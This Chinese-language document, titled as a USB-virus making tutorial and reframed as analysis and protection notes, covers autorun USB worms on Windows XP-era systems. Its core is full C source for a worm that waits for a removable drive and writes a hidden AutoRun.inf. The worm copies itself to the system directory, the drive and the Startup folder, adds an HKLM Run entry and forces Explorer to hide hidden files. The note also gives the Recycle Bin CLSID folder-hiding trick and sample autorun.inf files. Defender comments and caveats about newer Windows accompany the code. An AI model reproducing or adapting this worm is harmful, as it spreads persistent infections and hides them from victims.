U盘病毒制作教程（Autorun 型 U 盘蠕虫的原理分析与防护笔记。注意：文中手法针对 Windows XP 时代的系统，Windows 7 及安装了 KB971029 的 XP/Vista 只对 CD/DVD 处理 autorun.inf 的自动运行，可移动磁盘上的自动运行已失效；后面的持久化与隐藏手法仍有参考价值，用于识别和清理）
知识点:
---------------------------------------------------------------
新建文件夹的名字是（前面的“回收站”可以换成任意名字，起作用的是点号后面的 CLSID，它是回收站的 GUID，资源管理器会把带这种后缀的文件夹当作对应的 shell 命名空间来显示）:
回收站.{645FF040-5081-101B-9F08-00AA002F954E}
这样资源管理器会把它当作回收站来显示：双击它直接进入回收站，里面的文件在资源管理器中看不到。注意这只骗过资源管理器：在命令行用 dir /a、cd 进入该目录，或用任何不经过 shell 命名空间的工具，都能正常看到并删除其中的文件。
---------------------------------------------------------------
autorun.inf（示例。注意：Windows 7 以及安装了 KB971029 的 XP/Vista 只对 CD/DVD 处理 autorun.inf 的自动运行，可移动磁盘上的 open/shellexecute/shell 项不会再被自动执行。另外下面的 shell\open\Defalut 一行在 autorun.inf 文档中并没有这个键，正常情况下会被忽略）
[AutoRun]
open=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\open=打开(&o)
shell\open\command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\open\Defalut=1
shell\explore=资源管理(&o)
shell\explore\command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
---------------------------------------------------------------
让“显示隐藏文件”设置失效、使隐藏文件不可见的注册表项（以下是 U 盘病毒常改的位置，清理时应逐项恢复）:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
CheckedValue ------> 1  （说明：1 是系统默认值。病毒通常把它改成 0 或 2，使“显示所有文件和文件夹”选项选了也不生效；清理时应把它恢复为 1）
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Hidden ------------> 2  （2 = 不显示隐藏文件，1 = 显示隐藏文件；下面的 C 代码写的就是 2）
ShowSuperHidden ---> 1  （1 = 显示受保护的操作系统文件，0 = 隐藏。若目的是把带 system 属性的文件藏起来，应为 0）
---------------------------------------------------------------
关闭u盘自动播放功能:
1. 停止并禁用 Shell Hardware Detection（服务名 ShellHWDetection）服务（注意：这会同时关闭所有设备的自动播放检测）
2.打开组策略(gpedit.msc)找到“计算机配置”----“管理模板”---“系统”-----“关闭自动播放”,进行设置
3. 修改注册表 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:0000000c
（说明：该值是按驱动器类型的位掩码，0x0C 只禁用可移动磁盘(0x04)和固定磁盘(0x08)的自动运行，光驱、网络驱动器等仍会自动运行；要全部禁用请设为 0xFF，这也是微软 KB967715 的建议值。写在 HKEY_LOCAL_MACHINE 的同名路径下则对所有用户生效，且通常优先于 HKCU 的设置。）
// 20130927.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
#include <stdio.h>
//Global scratch path shared by CheckDisk() and VirusAction().
//[0] is the drive letter, patched in by CheckDisk(); the array is sized exactly to
//this initializer, yet VirusAction() later strcat()s "\\20130927.exe" onto it
//(see that function) — that write runs past the end of the array.
char U_path[]="a:\\回收站.{645FF040-5081-101B-9F08-00AA002F954E}";//default drive letter is a
//Find the drive letter of the first removable (USB) drive
//Scan drive letters 'a'..'z' and return the first one whose GetDriveType() is
//DRIVE_REMOVABLE; return NULL (i.e. 0) when none is found.
//Note: the probe string is built as "x:\\" — two backslashes, see the two '\\'
//stores below — rather than the "x:\" root form GetDriveType documents; whether
//that still resolves on a given Windows version is not established here.
//The scan starts at 'a', so a floppy drive (which also reports DRIVE_REMOVABLE)
//would be picked before any USB stick.
char GetUName()
{
char i;
char u_path[7]="";
for (i='a';i<='z';i++)
{
u_path[0]=i;
u_path[1]=':';
u_path[2]='\\';
u_path[3]='\\';
u_path[4]='\0';
if (GetDriveType(u_path)==DRIVE_REMOVABLE)
{
return i;
}
}
return NULL;
}
//If a removable drive is present, patch its letter into the global U_path and
//return true; otherwise leave U_path untouched and return false.
//GetUName() is called twice (once for the test, once for the assignment), so the
//drive list is scanned twice on the success path.
bool CheckDisk()
{
if (GetUName()!=NULL)
{
U_path[0]=GetUName();
return true;
}
return false;
}
//Poll for a removable drive every 5 seconds
//Block until CheckDisk() reports a removable drive, sleeping 5 s between probes.
//Never returns if no removable drive ever appears.
void ScanDisk()
{
while (!CheckDisk())
{
Sleep(5000);
}
}
//Infection / persistence routine (the payload)
//Infection and persistence routine. Annotated here as analysis notes for defenders:
//every artifact below is a usable indicator when cleaning an infected machine.
//Precondition: U_path[0] already holds the removable drive letter (set by CheckDisk()).
//Artifacts produced, in order:
//  1. <drive>:\AutoRun.inf (hidden+system+read-only) whose open/shell verbs point at
//     20130927.exe inside the "回收站.{645FF040-...}" folder on the drive.
//  2. A copy of the running executable in the system directory as 20130927.exe.
//  3. A copy in <drive>:\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\20130927.exe.
//  4. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value name "KeyName".
//  5. A copy in the hard-coded Chinese-locale Windows XP "All Users" Startup folder.
//  6. HKCU\...\Explorer\Advanced\Hidden = 2 (Explorer stops showing hidden files).
//Afterwards it either launches the USB copy hidden (when not already running from it)
//or sleeps forever. No API return value is checked. On Vista+ with UAC the system
//directory copy and the HKLM Run write need elevation, and Windows 7 / KB971029 no
//longer honours autorun.inf on removable media, so step 1 is inert on modern systems.
void VirusAction()
{
//
//
//Write the AutoRun.inf that the drive's double-click / "open" / "explore" verbs use.
char f_inf_name[]="a:\\AutoRun.inf";
f_inf_name[0]=U_path[0];
char f_inf_content[]="[AutoRun]\r\nopen=.\\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\\20130927.exe\r\nshell\\open\\Command=.\\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\\20130927.exe\r\nshell\\explore\\Command=.\\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\\20130927.exe";
//"wb+" truncates any existing AutoRun.inf; presumably fails (silently) once the file
//carries the read-only attribute set further down on a previous run.
FILE *pf_inf = fopen(f_inf_name,"wb+");
if (pf_inf!=NULL)
{
//sizeof(f_inf_content) includes the terminating NUL, so one extra 0 byte is written.
fwrite(f_inf_content,sizeof(char),sizeof(f_inf_content),pf_inf);
fclose(pf_inf);
}
//Hidden+system+read-only: Explorer hides it by default; `attrib -r -s -h` reveals it.
SetFileAttributes(f_inf_name,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);
//
//Copy itself into the system directory (GetSystemDirectory), as 20130927.exe.
char path_system[MAX_PATH];
GetSystemDirectory(path_system,MAX_PATH);
strcat(path_system,"\\20130927.exe");
char path_thisEXE[MAX_PATH];
GetModuleFileName(NULL,path_thisEXE,MAX_PATH);
//bFailIfExists=TRUE: an existing copy is never overwritten; the result is not checked.
CopyFile(path_thisEXE,path_system,TRUE);
//Copy to the USB drive, inside the CLSID-named folder.
CreateDirectory(U_path,NULL);
//NOTE: U_path is a global sized exactly to its initializer; this strcat writes past
//the end of the array (undefined behaviour).
strcat(U_path,"\\20130927.exe");
CopyFile(path_thisEXE,U_path,TRUE);
//
//Persistence 1: HKLM Run value (literally named "KeyName") pointing at the system copy.
//KEY_ALL_ACCESS on HKLM needs administrative rights; on failure h_openkey is left
//uninitialized and still passed to RegSetValueEx below.
HKEY h_openkey;
DWORD cbData_1=200;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_ALL_ACCESS,&h_openkey);
//The data length is a fixed 200 bytes rather than strlen(path_system)+1, so whatever
//bytes follow the NUL in path_system are stored as part of the value.
RegSetValueEx(h_openkey,"KeyName",0,REG_SZ,(BYTE*)path_system,cbData_1);
RegCloseKey(h_openkey);
//Persistence 2: copy into the Startup folder. The path is the hard-coded
//Chinese-locale Windows XP location and does not exist on Vista+ or other locales.
char t_AutoStartPath[MAX_PATH]="C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动";
strcat(t_AutoStartPath,"\\20130927.exe");
CopyFile(path_thisEXE,t_AutoStartPath,TRUE);
//
//Hide itself:
//set Explorer's "do not show hidden files" (Hidden=2) for the current user.
DWORD Data=2;
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced",0,KEY_ALL_ACCESS,&h_openkey);
RegSetValueEx(h_openkey,"Hidden",0,REG_DWORD,(const BYTE*)(&Data),sizeof(Data));//the size argument matters: a REG_DWORD must be exactly 4 bytes
RegCloseKey(h_openkey);
//
//
//
// Placeholder in the original for an arbitrary payload ("evil behaviour").
//
//
//
//
//Run the copy on the USB drive so that a running process holds the file (the
//original's stated intent: prevent deletion).
if (strcmp(path_thisEXE,U_path)!=0) //only when not already running from the USB copy
{
WinExec(U_path,SW_HIDE);
}
else
{
while(1)//never exit; keeps the process alive
{
Sleep(50*1000);//throttle the idle loop
}
}
}
//Entry point: wait for a removable drive, then run the infection routine.
//VirusAction() may never return (it loops forever when running from the USB copy),
//so this function returns 0 only on the non-USB path.
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
//Two phases: drive scan, then infection.
//Drive scan — blocks until a removable drive is present.
ScanDisk();
//VirusAction() is only reached once ScanDisk() has found a drive.
VirusAction();
return 0;
}
Autorun.inf 文件内容（以下是几种常见写法的示例，均用 notepad.exe 代替真实程序；最后一段与上面 C 代码写入的内容相同）:
autorun 病毒示例（再次提醒：Windows 7 及安装了 KB971029 的系统不再自动执行可移动磁盘上的 autorun.inf，这些写法只对旧系统有效）:
Autorun.inf
[AutoRun]
open=notepad.exe
shellexecute=notepad.exe
shell\Auto\command=notepad.exe
[AutoRun]
open=notepad.exe
shell\open=打开(&o)
shell\open\command=notepad.exe
shell\open\Defalut=1
shell\explore=资源管理(&o)
shell\explore\command=notepad.exe
[AutoRun]
open=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\open=打开(&o)
shell\open\command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\open\Defalut=1
shell\explore=资源管理(&o)
shell\explore\command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
open=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\open\Command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\explore\Command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe